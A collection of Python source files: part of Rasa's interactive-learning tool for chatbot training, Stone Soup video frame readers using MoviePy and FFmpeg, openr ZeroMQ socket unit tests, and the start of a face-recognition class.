return (answers["export_stories"],
answers["export_nlu"],
answers["export_domain"])
def _split_conversation_at_restarts(
evts: List[Dict[Text, Any]]
) -> List[List[Dict[Text, Any]]]:
"""Split a conversation at restart events.
Returns an array of event lists, without the restart events."""
sub_conversations = []
current = []
for e in evts:
if e.get("event") == "restart":
if current:
sub_conversations.append(current)
current = []
else:
current.append(e)
if current:
sub_conversations.append(current)
return sub_conversations
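# Example (editorial, hypothetical events): splitting
#     [{"event": "user"}, {"event": "restart"}, {"event": "user"}]
# yields [[{"event": "user"}], [{"event": "user"}]]; the restart markers
# themselves are dropped and empty sub-conversations are not emitted.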
def _collect_messages(evts: List[Dict[Text, Any]]) -> List[Message]:
"""Collect the message text and parsed data from the UserMessage events
into a list"""
from rasa_nlu.extractors.duckling_http_extractor import \
DucklingHTTPExtractor
from rasa_nlu.extractors.mitie_entity_extractor import MitieEntityExtractor
from rasa_nlu.extractors.spacy_entity_extractor import SpacyEntityExtractor
msgs = []
for evt in evts:
if evt.get("event") == UserUttered.type_name:
data = evt.get("parse_data")
for entity in data.get("entities", []):
excluded_extractors = [
DucklingHTTPExtractor.__name__,
SpacyEntityExtractor.__name__,
MitieEntityExtractor.__name__
]
logger.debug("Exclude entity marking of following extractors"
" {} when writing nlu data "
"to file.".format(excluded_extractors))
if entity.get("extractor") in excluded_extractors:
data["entities"].remove(entity)
msg = Message.build(data["text"], data["intent"]["name"],
data["entities"])
msgs.append(msg)
return msgs
def _collect_actions(evts: List[Dict[Text, Any]]) -> List[Dict[Text, Any]]:
"""Collect all the `ActionExecuted` events into a list."""
return [evt
for evt in evts
if evt.get("event") == ActionExecuted.type_name]
async def _write_stories_to_file(
export_story_path: Text,
evts: List[Dict[Text, Any]]
) -> None:
"""Write the conversation of the sender_id to the file paths."""
sub_conversations = _split_conversation_at_restarts(evts)
with open(export_story_path, 'a', encoding="utf-8") as f:
for conversation in sub_conversations:
parsed_events = events.deserialise_events(conversation)
s = Story.from_events(parsed_events)
f.write(s.as_story_string(flat=True) + "\n")
async def _write_nlu_to_file(
export_nlu_path: Text,
evts: List[Dict[Text, Any]]
) -> None:
"""Write the nlu data of the sender_id to the file paths."""
from rasa_nlu.training_data import TrainingData
msgs = _collect_messages(evts)
# noinspection PyBroadException
try:
previous_examples = load_data(export_nlu_path)
except Exception as e:
logger.exception("An exception occurred while trying to load the "
"NLU data.")
export_nlu_path = questionary.text(
message="Could not load existing NLU data, please "
"specify where to store NLU data learned in "
"this session (this will overwrite any "
"existing file). {}".format(str(e)),
default=PATHS["backup"]).ask()
if export_nlu_path is None:
return
previous_examples = TrainingData()
nlu_data = previous_examples.merge(TrainingData(msgs))
# need to guess the format of the file before opening it for writing,
# since opening it in write mode would truncate the existing data
if _guess_format(export_nlu_path) in {"md", "unk"}:
fformat = "md"
else:
fformat = "json"
with open(export_nlu_path, 'w', encoding="utf-8") as f:
if fformat == "md":
f.write(nlu_data.as_markdown())
else:
f.write(nlu_data.as_json())
def _entities_from_messages(messages):
"""Return all entities that occur in atleast one of the messages."""
return list({e["entity"]
for m in messages
for e in m.data.get("entities", [])})
def _intents_from_messages(messages):
"""Return all intents that occur in at least one of the messages."""
# set of distinct intents
intents = {m.data["intent"]
for m in messages
if "intent" in m.data}
return [{i: {"use_entities": True}} for i in intents]
async def _write_domain_to_file(
domain_path: Text,
evts: List[Dict[Text, Any]],
endpoint: EndpointConfig
) -> None:
"""Write an updated domain file to the file path."""
domain = await retrieve_domain(endpoint)
old_domain = Domain.from_dict(domain)
messages = _collect_messages(evts)
actions = _collect_actions(evts)
# TODO for now there is no way to distinguish between action and form
intent_properties = Domain.collect_intent_properties(
_intents_from_messages(messages))
collected_actions = list({e["name"]
for e in actions
if e["name"] not in default_action_names()})
new_domain = Domain(
intent_properties=intent_properties,
entities=_entities_from_messages(messages),
slots=[],
templates={},
action_names=collected_actions,
form_names=[])
old_domain.merge(new_domain).persist_clean(domain_path)
async def _predict_till_next_listen(endpoint: EndpointConfig,
sender_id: Text,
finetune: bool,
sender_ids: List[Text],
plot_file: Optional[Text]
) -> None:
"""Predict and validate actions until we need to wait for a user msg."""
listen = False
while not listen:
result = await request_prediction(endpoint, sender_id)
predictions = result.get("scores")
probabilities = [prediction["score"] for prediction in predictions]
pred_out = int(np.argmax(probabilities))
action_name = predictions[pred_out].get("action")
policy = result.get("policy")
confidence = result.get("confidence")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint,
unconfirmed=[ActionExecuted(action_name)])
listen = await _validate_action(action_name, policy, confidence,
predictions, endpoint, sender_id,
finetune=finetune)
await _plot_trackers(sender_ids, plot_file, endpoint)
async def _correct_wrong_nlu(corrected_nlu: Dict[Text, Any],
evts: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text
) -> None:
"""A wrong NLU prediction got corrected, update core's tracker."""
latest_message = latest_user_message(evts)
corrected_events = all_events_before_latest_user_msg(evts)
latest_message["parse_data"] = corrected_nlu
await replace_events(endpoint, sender_id, corrected_events)
await send_message(endpoint, sender_id, latest_message.get("text"),
latest_message.get("parse_data"))
async def _correct_wrong_action(corrected_action: Text,
endpoint: EndpointConfig,
sender_id: Text,
finetune: bool = False,
is_new_action: bool = False
) -> None:
"""A wrong action prediction got corrected, update core's tracker."""
result = await send_action(endpoint,
sender_id,
corrected_action,
is_new_action=is_new_action)
if finetune:
await send_finetune(endpoint,
result.get("tracker", {}).get("events", []))
def _form_is_rejected(action_name, tracker):
"""Check if the form got rejected with the most recent action name."""
return (tracker.get('active_form', {}).get('name') and
action_name != tracker['active_form']['name'] and
action_name != ACTION_LISTEN_NAME)
def _form_is_restored(action_name, tracker):
"""Check whether the form is called again after it was rejected."""
return (tracker.get('active_form', {}).get('rejected') and
tracker.get('latest_action_name') == ACTION_LISTEN_NAME and
action_name == tracker.get('active_form', {}).get('name'))
async def _confirm_form_validation(action_name, tracker, endpoint, sender_id):
"""Ask a user whether an input for a form should be validated.
Prior to this call, the active form was chosen after it was rejected."""
requested_slot = tracker.get("slots", {}).get(REQUESTED_SLOT)
validation_questions = questionary.confirm(
"Should '{}' validate user input to fill "
"the slot '{}'?".format(action_name, requested_slot))
validate_input = await _ask_questions(validation_questions, sender_id,
endpoint)
if not validate_input:
# notify form action to skip validation
await send_event(endpoint, sender_id,
{"event": "form_validation", "validate": False})
elif not tracker.get('active_form', {}).get('validate'):
# handle contradiction with learned behaviour
warning_question = questionary.confirm(
"ERROR: FormPolicy predicted no form validation "
"based on previous training stories. "
"Make sure to remove contradictory stories "
"from training data. "
"Otherwise predicting no form validation "
"will not work as expected.")
await _ask_questions(warning_question, sender_id, endpoint)
# notify form action to validate an input
await send_event(endpoint, sender_id,
{"event": "form_validation", "validate": True})
async def _validate_action(action_name: Text,
policy: Text,
confidence: float,
predictions: List[Dict[Text, Any]],
endpoint: EndpointConfig,
sender_id: Text,
finetune: bool = False
) -> bool:
"""Query the user to validate if an action prediction is correct.
Returns `True` if the prediction is correct, `False` otherwise."""
question = questionary.confirm(
"The bot wants to run '{}', correct?".format(action_name))
is_correct = await _ask_questions(question, sender_id, endpoint)
if not is_correct:
action_name, is_new_action = await _request_action_from_user(
predictions, sender_id, endpoint)
else:
is_new_action = False
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
if _form_is_rejected(action_name, tracker):
# notify the tracker that form was rejected
await send_event(endpoint, sender_id,
{"event": "action_execution_rejected",
"name": tracker['active_form']['name']})
elif _form_is_restored(action_name, tracker):
await _confirm_form_validation(action_name, tracker, endpoint,
sender_id)
if not is_correct:
await _correct_wrong_action(action_name, endpoint, sender_id,
finetune=finetune,
is_new_action=is_new_action)
else:
await send_action(endpoint, sender_id, action_name, policy, confidence)
return action_name == ACTION_LISTEN_NAME
def _as_md_message(parse_data: Dict[Text, Any]) -> Text:
"""Display the parse data of a message in markdown format."""
from rasa_nlu.training_data.formats import MarkdownWriter
if parse_data.get("text", "").startswith(INTENT_MESSAGE_PREFIX):
return parse_data.get("text")
if not parse_data.get("entities"):
parse_data["entities"] = []
# noinspection PyProtectedMember
return MarkdownWriter()._generate_message_md(parse_data)
def _validate_user_regex(latest_message: Dict[Text, Any],
intents: List[Text]) -> bool:
"""Validate if a users message input is correct.
This assumes the user entered an intent directly, e.g. using
`/greet`. Return `True` if the intent is a known one."""
parse_data = latest_message.get("parse_data", {})
intent = parse_data.get("intent", {}).get("name")
if intent in intents:
return True
else:
return False
async def _validate_user_text(latest_message: Dict[Text, Any],
endpoint: EndpointConfig, sender_id: Text
) -> bool:
"""Validate a user message input as free text.
This assumes the user message is a text message (so NOT `/greet`)."""
parse_data = latest_message.get("parse_data", {})
text = _as_md_message(parse_data)
intent = parse_data.get("intent", {}).get("name")
entities = parse_data.get("entities", [])
if entities:
message = ("Is the intent '{}' correct for '{}' and are "
"all entities labeled correctly?"
.format(text, intent))
else:
message = ("Your NLU model classified '{}' with intent '{}'"
" and there are no entities, is this correct?"
.format(text, intent))
if intent is None:
print("The NLU classification for '{}' returned '{}'"
"".format(text, intent))
return False
else:
question = questionary.confirm(message)
return await _ask_questions(question, sender_id, endpoint)
async def _validate_nlu(intents: List[Text],
endpoint: EndpointConfig,
sender_id: Text) -> None:
"""Validate if a user message, either text or intent is correct.
If the prediction of the latest user message is incorrect,
the tracker will be corrected with the correct intent / entities."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.AFTER_RESTART)
latest_message = latest_user_message(tracker.get("events", []))
if latest_message.get("text").startswith(INTENT_MESSAGE_PREFIX):
valid = _validate_user_regex(latest_message, intents)
else:
valid = await _validate_user_text(latest_message, endpoint, sender_id)
if not valid:
corrected_intent = await _request_intent_from_user(latest_message,
intents,
sender_id, endpoint)
evts = tracker.get("events", [])
entities = await _correct_entities(latest_message, endpoint, sender_id)
corrected_nlu = {
"intent": corrected_intent,
"entities": entities,
"text": latest_message.get("text")
}
await _correct_wrong_nlu(corrected_nlu, evts, endpoint, sender_id)
async def _correct_entities(latest_message: Dict[Text, Any],
endpoint: EndpointConfig,
sender_id: Text) -> List[Dict[Text, Any]]:
"""Validate the entities of a user message.
Returns the corrected entities"""
from rasa_nlu.training_data.formats import MarkdownReader
parse_original = latest_message.get("parse_data", {})
entity_str = _as_md_message(parse_original)
question = questionary.text(
"Please mark the entities using [value](type) notation",
default=entity_str)
annotation = await _ask_questions(question, sender_id, endpoint)
# noinspection PyProtectedMember
parse_annotated = MarkdownReader()._parse_training_example(annotation)
corrected_entities = _merge_annotated_and_original_entities(
parse_annotated, parse_original)
return corrected_entities
def _merge_annotated_and_original_entities(parse_annotated, parse_original):
# overwrite entities which have already been
# annotated in the original annotation to preserve
# additional entity parser information
entities = parse_annotated.get("entities", [])[:]
for i, entity in enumerate(entities):
for original_entity in parse_original.get("entities", []):
if _is_same_entity_annotation(entity, original_entity):
entities[i] = original_entity
break
return entities
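# Example (editorial, hypothetical entities): if the user re-annotates
#     {"value": "Berlin", "entity": "city"}
# and the original parse contained the same value/entity pair enriched with
# extractor metadata (e.g. {"value": "Berlin", "entity": "city",
# "extractor": "SpacyEntityExtractor", "start": 10, "end": 16}), the enriched
# original dict is kept in place of the bare annotation.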
def _is_same_entity_annotation(entity, other):
return (entity['value'] == other['value'] and
entity['entity'] == other['entity'])
async def _enter_user_message(sender_id: Text,
endpoint: EndpointConfig) -> None:
"""Request a new message from the user."""
question = questionary.text("Your input ->")
message = await _ask_questions(question, sender_id, endpoint,
lambda a: not a)
if message == (INTENT_MESSAGE_PREFIX + constants.USER_INTENT_RESTART):
raise RestartConversation()
await send_message(endpoint, sender_id, message)
async def is_listening_for_message(sender_id: Text,
endpoint: EndpointConfig) -> bool:
"""Check if the conversation is in need for a user message."""
tracker = await retrieve_tracker(endpoint, sender_id,
EventVerbosity.APPLIED)
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") == UserUttered.type_name:
return False
elif e.get("event") == ActionExecuted.type_name:
return e.get("name") == ACTION_LISTEN_NAME
return False
async def _undo_latest(sender_id: Text,
endpoint: EndpointConfig) -> None:
"""Undo either the latest bot action or user message, whatever is last."""
tracker = await retrieve_tracker(endpoint, sender_id, EventVerbosity.ALL)
cutoff_index = None
for i, e in enumerate(reversed(tracker.get("events", []))):
if e.get("event") in {ActionExecuted.type_name, UserUttered.type_name}:
cutoff_index = i
break
elif e.get("event") == Restarted.type_name:
break
if cutoff_index is not None:
events_to_keep = tracker["events"][:-(cutoff_index + 1)]
# reset the events of the conversation to the events before
# the most recent bot or user event
await replace_events(endpoint, sender_id, events_to_keep)
async def _fetch_events(sender_ids: List[Union[Text, List[Event]]],
endpoint: EndpointConfig
) -> List[List[Event]]:
"""Retrieve all event trackers from the endpoint for all sender ids."""
event_sequences = []
for sender_id in sender_ids:
if isinstance(sender_id, str):
tracker = await retrieve_tracker(endpoint, sender_id)
evts = tracker.get("events", [])
for conversation in _split_conversation_at_restarts(evts):
parsed_events = events.deserialise_events(conversation)
event_sequences.append(parsed_events)
else:
event_sequences.append(sender_id)
return event_sequences
async def _plot_trackers(sender_ids: List[Union[Text, List[Event]]],
output_file: Optional[Text],
endpoint: EndpointConfig,
unconfirmed: Optional[List[Event]] = None
):
"""Create a plot of the trackers of the passed sender ids.
This assumes that the last sender id is the conversation we are currently
working on. If there are events that are not part of this active tracker
yet, they can be passed as part of `unconfirmed`. They will be appended
to the currently active conversation."""
if not output_file or not sender_ids:
# if there is no output file provided, we are going to skip plotting
# same happens if there are no sender ids
return None
event_sequences = await _fetch_events(sender_ids, endpoint)
if unconfirmed:
event_sequences[-1].extend(unconfirmed)
graph = await visualize_neighborhood(event_sequences[-1],
event_sequences,
output_file=None,
max_history=2)
from networkx.drawing.nx_pydot import write_dot
write_dot(graph, output_file)
def _print_help(skip_visualization: bool) -> None:
"""Print some initial help message for the user."""
if not skip_visualization:
visualization_url = DEFAULT_SERVER_FORMAT.format(
DEFAULT_SERVER_PORT + 1)
visualization_help = ("Visualisation at {}/visualization.html."
"".format(visualization_url))
else:
visualization_help = ""
rasa.cli.utils.print_success("Bot loaded. {}\n"
"Type a message and press enter "
"(press 'Ctr-c' to exit). "
"".format(visualization_help))
async def record_messages(endpoint: EndpointConfig,
sender_id: Text = UserMessage.DEFAULT_SENDER_ID,
max_message_limit: Optional[int] = None,
finetune: bool = False,
stories: Optional[Text] = None,
skip_visualization: bool = False
):
"""Read messages from the command line and print bot responses."""
from rasa.core import training
try:
_print_help(skip_visualization)
try:
domain = await retrieve_domain(endpoint)
except ClientError:
logger.exception("Failed to connect to Rasa Core server at '{}'. "
"Is the server running?".format(endpoint.url))
return
trackers = await training.load_data(stories, Domain.from_dict(domain),
augmentation_factor=0,
use_story_concatenation=False,
)
intents = [next(iter(i)) for i in (domain.get("intents") or [])]
num_messages = 0
sender_ids = [t.events for t in trackers] + [sender_id]
if not skip_visualization:
plot_file = "story_graph.dot"
await _plot_trackers(sender_ids, plot_file, endpoint)
else:
plot_file = None
while not utils.is_limit_reached(num_messages, max_message_limit):
try:
if await is_listening_for_message(sender_id, endpoint):
await _enter_user_message(sender_id, endpoint)
await _validate_nlu(intents, endpoint, sender_id)
await _predict_till_next_listen(endpoint, sender_id,
finetune, sender_ids, plot_file)
num_messages += 1
except RestartConversation:
await send_event(endpoint, sender_id,
Restarted().as_dict())
await send_event(endpoint, sender_id,
ActionExecuted(ACTION_LISTEN_NAME).as_dict())
logger.info("Restarted conversation, starting a new one.")
except UndoLastStep:
await _undo_latest(sender_id, endpoint)
await _print_history(sender_id, endpoint)
except ForkTracker:
await _print_history(sender_id, endpoint)
evts_fork = await _request_fork_from_user(sender_id, endpoint)
await send_event(endpoint, sender_id,
Restarted().as_dict())
if evts_fork:
for evt in evts_fork:
await send_event(endpoint, sender_id, evt)
logger.info("Restarted conversation at fork.")
await _print_history(sender_id, endpoint)
await _plot_trackers(sender_ids, plot_file, endpoint)
except Abort:
return
except Exception:
logger.exception("An exception occurred while recording messages.")
raise
def _serve_application(app, stories, finetune, skip_visualization):
"""Start a core server and attach the interactive learning IO."""
endpoint = EndpointConfig(url=DEFAULT_SERVER_URL)
async def run_interactive_io(running_app: Sanic):
"""Small wrapper to shut down the server once cmd io is done."""
await record_messages(
endpoint=endpoint,
stories=stories,
finetune=finetune,
skip_visualization=skip_visualization,
sender_id=uuid.uuid4().hex)
logger.info("Killing Sanic server now.")
running_app.stop() # kill the sanic server
app.add_task(run_interactive_io)
app.run(host='0.0.0.0', port=DEFAULT_SERVER_PORT, access_log=True)
return app
def start_visualization(image_path: Text = None) -> None:
"""Add routes to serve the conversation visualization files."""
app = Sanic(__name__)
# noinspection PyUnusedLocal
@app.exception(NotFound)
async def ignore_404s(request, exception):
return response.text("Not found", status=404)
# noinspection PyUnusedLocal
@app.route(VISUALIZATION_TEMPLATE_PATH, methods=["GET"])
def visualisation_html(request):
return response.file(visualization.visualization_html_path())
# noinspection PyUnusedLocal
@app.route("/visualization.dot", methods=["GET"])
def visualisation_png(request):
try:
headers = {'Cache-Control': "no-cache"}
return response.file(os.path.abspath(image_path), headers=headers)
except FileNotFoundError:
return response.text("", 404)
app.run(host='0.0.0.0', port=DEFAULT_SERVER_PORT + 1, access_log=False)
# noinspection PyUnusedLocal
async def train_agent_on_start(args, endpoints, additional_arguments, app,
loop):
_interpreter = NaturalLanguageInterpreter.create(args.get("nlu"),
endpoints.nlu)
model_directory = args.get("out", tempfile.mkdtemp(suffix="_core_model"))
_agent = await train(args.get("domain"),
args.get("stories"),
model_directory,
_interpreter,
endpoints,
args.get("dump_stories"),
args.get("config")[0],
None,
additional_arguments)
app.agent = _agent
async def wait_til_server_is_running(endpoint,
max_retries=30,
sleep_between_retries=1):
"""Try to reach the server, retry a couple of times and sleep in between."""
while max_retries:
try:
r = await retrieve_status(endpoint)
logger.info("Reached core: {}".format(r))
if not r.get("is_ready"):
# server did not finish loading the agent yet
# in this case, we need to wait till the model trained
# so we might be sleeping for a while...
await asyncio.sleep(sleep_between_retries)
continue
else:
# server is ready to go
return True
except ClientError:
max_retries -= 1
if max_retries:
await asyncio.sleep(sleep_between_retries)
return False
def run_interactive_learning(stories: Text = None,
finetune: bool = False,
skip_visualization: bool = False,
server_args: Dict[Text, Any] = None,
additional_arguments: Dict[Text, Any] = None
):
"""Start the interactive learning with the model of the agent."""
server_args = server_args or {}
if not skip_visualization:
p = Process(target=start_visualization, args=("story_graph.dot",))
p.daemon = True
p.start()
else:
p = None
app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("core"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("core"),
endpoints, server_args.get("nlu")),
'before_server_start')
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints,
additional_arguments),
'before_server_start')
_serve_application(app, stories, finetune, skip_visualization)
if not skip_visualization:
p.terminate()
p.join()
|
video.py
|
# -*- coding: utf-8 -*-
"""Video readers for Stone Soup.
This is a collection of video readers for Stone Soup, allowing quick reading
of video data/streams.
"""
import datetime
import threading
from abc import abstractmethod
from queue import Queue
from typing import Mapping, Tuple, Sequence, Any
from urllib.parse import ParseResult
import numpy as np
try:
import ffmpeg
import moviepy.editor as mpy
except ImportError as error:
raise ImportError(
"Usage of video processing classes requires that the optional"
"package dependencies 'moviepy' and 'ffmpeg-python' are installed. "
"This can be achieved by running "
"'python -m pip install stonesoup[video]'")\
from error
from .base import SensorDataReader
from .file import FileReader
from .url import UrlReader
from ..base import Property
from ..buffered_generator import BufferedGenerator
from ..types.sensordata import ImageFrame
class FrameReader(SensorDataReader):
"""FrameReader base class
A FrameReader produces :class:`~.SensorData` in the form of
:class:`~ImageFrame` objects.
"""
@property
def frame(self):
return self.sensor_data
@abstractmethod
@BufferedGenerator.generator_method
def frames_gen(self):
"""Returns a generator of frames for each time step.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
raise NotImplementedError
@BufferedGenerator.generator_method
def sensor_data_gen(self):
"""Returns a generator of frames for each time step.
Note
----
This is just a wrapper around (and therefore performs identically
to) :meth:`~frames_gen`.
Yields
------
: :class:`datetime.datetime`
Datetime of current time step
: set of :class:`~.ImageFrame`
Generated frame in the time step
"""
yield from self.frames_gen()
class VideoClipReader(FileReader, FrameReader):
"""VideoClipReader
A simple reader that uses MoviePy_ to read video frames from a file.
Usage of MoviePy allows for the application of clip transformations
and effects, as per the MoviePy documentation_. Upon instantiation,
the underlying MoviePy `VideoFileClip` instance can be accessed
through the :attr:`~clip` class property. This can then be used
as expected, e.g.:
.. code-block:: python
# Rearrange RGB to BGR
def arrange_bgr(image):
return image[:, :, [2, 1, 0]]
reader = VideoClipReader("path_to_file")
reader.clip = reader.clip.fl_image(arrange_bgr)
for timestamp, frame in reader:
# The generated frame.pixels will now
# be arranged in BGR format.
...
.. _MoviePy: https://zulko.github.io/moviepy/index.html
.. _documentation: https://zulko.github.io/moviepy/getting_started/effects.html
""" # noqa:E501
start_time = Property(datetime.timedelta,
doc="Start time expressed as duration "
"from the start of the clip",
default=datetime.timedelta(seconds=0))
end_time = Property(datetime.timedelta,
doc="End time expressed as duration "
"from the start of the clip",
default=None)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
end_time_sec = self.end_time.total_seconds() if self.end_time is not None else None
self.clip = mpy.VideoFileClip(str(self.path)) \
.subclip(self.start_time.total_seconds(), end_time_sec)
@BufferedGenerator.generator_method
def frames_gen(self):
start_time = datetime.datetime.now()
for timestamp_sec, pixels in self.clip.iter_frames(with_times=True):
timestamp = start_time + datetime.timedelta(seconds=timestamp_sec)
frame = ImageFrame(pixels, timestamp)
yield timestamp, frame
class FFmpegVideoStreamReader(UrlReader, FrameReader):
""" FFmpegVideoStreamReader
A threaded reader that uses ffmpeg-python_ to read frames from video
streams (e.g. RTSP) in real-time.
Notes
-----
- Use of this class requires that FFmpeg_ is installed on the host machine.
- By default, FFmpeg performs internal buffering of frames leading to a \
slight delay in the incoming frames (0.5-1 sec). To remove the delay it \
is recommended to set ``input_opts={'threads': 1, 'fflags': 'nobuffer'}`` \
when instantiating a reader, e.g.:
.. code-block:: python
video_reader = FFmpegVideoStreamReader('rtsp://192.168.0.10:554/1/h264minor',
input_opts={'threads': 1, 'fflags': 'nobuffer'})
for timestamp, frame in video_reader:
....
.. _ffmpeg-python: https://github.com/kkroening/ffmpeg-python
.. _FFmpeg: https://www.ffmpeg.org/download.html
"""
url: ParseResult = Property(
doc="Input source to read video stream from, passed as input url argument. This can "
"include any valid FFmpeg input e.g. rtsp URL, device name when using 'dshow'/'v4l2'")
buffer_size: int = Property(
default=1,
doc="Size of the frame buffer. The frame buffer is used to cache frames in cases where "
"the stream generates frames faster than they are ingested by the reader. If "
"`buffer_size` is less than or equal to zero, the buffer size is infinite.")
input_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg input options, provided in the form of a dictionary, whose keys correspond to "
"option names. (e.g. ``{'fflags': 'nobuffer'}``). The default is ``{}``.")
output_opts: Mapping[str, str] = Property(
default=None,
doc="FFmpeg output options, provided in the form of a dictionary, whose keys correspond "
"to option names. The default is ``{'f': 'rawvideo', 'pix_fmt': 'rgb24'}``.")
filters: Sequence[Tuple[str, Sequence[Any], Mapping[Any, Any]]] = Property(
default=None,
doc="FFmpeg filters, provided in the form of a list of filter name, sequence of "
"arguments, mapping of key/value pairs (e.g. ``[('scale', ('320', '240'), {})]``). "
"Default `None` where no filter will be applied. Note that :attr:`frame_size` may "
"need to be set in when video size changed by filter.")
frame_size: Tuple[int, int] = Property(
default=None,
doc="Tuple of frame width and height. Default `None` where it will be detected using "
"`ffprobe` against the input, but this may yield wrong width/height (e.g. when "
"filters are applied), and such this option can be used to override.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if self.input_opts is None:
self.input_opts = {}
if self.output_opts is None:
self.output_opts = {'f': 'rawvideo', 'pix_fmt': 'rgb24'}
if self.filters is None:
self.filters = []
self.buffer = Queue(maxsize=self.buffer_size)
if self.frame_size is not None:
self._stream_info = {
'width': self.frame_size[0],
'height': self.frame_size[1]}
else:
# Probe stream information
self._stream_info = next(
s
for s in ffmpeg.probe(self.url.geturl(), **self.input_opts)['streams']
if s['codec_type'] == 'video')
# Initialise stream
self.stream = ffmpeg.input(self.url.geturl(), **self.input_opts)
for filter_ in self.filters:
filter_name, filter_args, filter_kwargs = filter_
self.stream = self.stream.filter(
filter_name, *filter_args, **filter_kwargs
)
self.stream = (
self.stream
.output('pipe:', **self.output_opts)
.global_args('-y', '-loglevel', 'panic')
.run_async(pipe_stdout=True)
)
# Initialise capture thread
self._capture_thread = threading.Thread(target=self._run)
self._capture_thread.daemon = True
self._capture_thread.start()
@BufferedGenerator.generator_method
def frames_gen(self):
while self._capture_thread.is_alive():
# if not self.buffer.empty():
frame = self.buffer.get()
timestamp = frame.timestamp
yield timestamp, frame
def _run(self):
while self.stream.poll() is None:
width = int(self._stream_info['width'])
height = int(self._stream_info['height'])
# Read bytes from stream
in_bytes = self.stream.stdout.read(width * height * 3)
if in_bytes:
# Transform bytes to pixels
frame_np = (
np.frombuffer(in_bytes, np.uint8)
.reshape([height, width, 3])
)
frame = ImageFrame(frame_np, datetime.datetime.now())
# Write new frame to buffer
self.buffer.put(frame)
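# Illustrative sketch (added, not part of the original module): combining the `filters`
# and `frame_size` properties documented above, mirroring the class docstring example.
# The RTSP URL is a placeholder assumption.
def _example_scaled_stream_reader():
    reader = FFmpegVideoStreamReader(
        'rtsp://192.168.0.10:554/1/h264minor',
        input_opts={'threads': 1, 'fflags': 'nobuffer'},
        filters=[('scale', ('320', '240'), {})],
        frame_size=(320, 240))  # override, since ffprobe would report the unscaled size
    for timestamp, frame in reader:
        print(timestamp, frame.pixels.shape)  # expected (240, 320, 3)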
|
zmq_socket_tests.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import unittest
from multiprocessing import Process
import zmq
from openr.Lsdb import ttypes as lsdb_types
from openr.utils import zmq_socket
class TestSocket(unittest.TestCase):
def test_req_rep(self):
zmq_ctx = zmq.Context()
rep_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
rep_socket.bind("inproc://req_rep_test")
req_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REQ)
req_socket.connect("inproc://req_rep_test")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
req_socket.send_thrift_obj(thrift_obj)
recv_obj = rep_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
rep_socket.send_thrift_obj(recv_obj)
recv_obj = req_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_pub_sub(self):
zmq_ctx = zmq.Context()
pub_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.PUB)
pub_socket.bind("inproc://req_rep_test")
sub_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.SUB)
sub_socket.connect("inproc://req_rep_test")
sub_socket.set_sock_opt(zmq.SUBSCRIBE, b"")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
pub_socket.send_thrift_obj(thrift_obj)
recv_obj = sub_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_dealer_dealer(self):
zmq_ctx = zmq.Context()
d_socket_1 = zmq_socket.ZmqSocket(zmq_ctx, zmq.DEALER)
d_socket_1.bind("inproc://dealer_test")
d_socket_2 = zmq_socket.ZmqSocket(zmq_ctx, zmq.DEALER)
d_socket_2.connect("inproc://dealer_test")
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
d_socket_1.send_thrift_obj(thrift_obj)
recv_obj = d_socket_2.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
d_socket_2.send_thrift_obj(recv_obj)
recv_obj = d_socket_1.recv_thrift_obj(lsdb_types.PrefixDatabase)
self.assertEqual(thrift_obj, recv_obj)
def test_status_conflicts(self):
zmq_ctx = zmq.Context()
bind_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
bind_socket.bind("inproc://status_test")
with self.assertRaises(Exception):
bind_socket.connect("inproc://status_test")
connect_socket = zmq_socket.ZmqSocket(zmq_ctx, zmq.REP)
connect_socket.connect("inproc://status_test")
with self.assertRaises(Exception):
connect_socket.bind("inproc://status_test")
def test_in_multi_processes(self):
thrift_obj = lsdb_types.PrefixDatabase()
thrift_obj.thisNodeName = "some node"
def _send_recv():
req_socket = zmq_socket.ZmqSocket(zmq.Context(), zmq.REQ)
req_socket.connect("tcp://localhost:5000")
req_socket.send_thrift_obj(thrift_obj)
print("request sent")
recv_obj = req_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
print("reply received")
self.assertEqual(thrift_obj, recv_obj)
def _recv_send():
rep_socket = zmq_socket.ZmqSocket(zmq.Context(), zmq.REP)
rep_socket.bind("tcp://*:5000")
recv_obj = rep_socket.recv_thrift_obj(lsdb_types.PrefixDatabase)
print("request received")
self.assertEqual(thrift_obj, recv_obj)
rep_socket.send_thrift_obj(recv_obj)
print("reply sent")
q = Process(target=_recv_send)
q.start()
p = Process(target=_send_recv)
p.start()
p.join()
q.join()
|
recognition.py
|
import numpy as np
import multiprocessing
import face_recognition
import os
import pickle
from faceApi import settings
import cv2
class Recognizer:
'''
face recognition using face_recognition api
'''
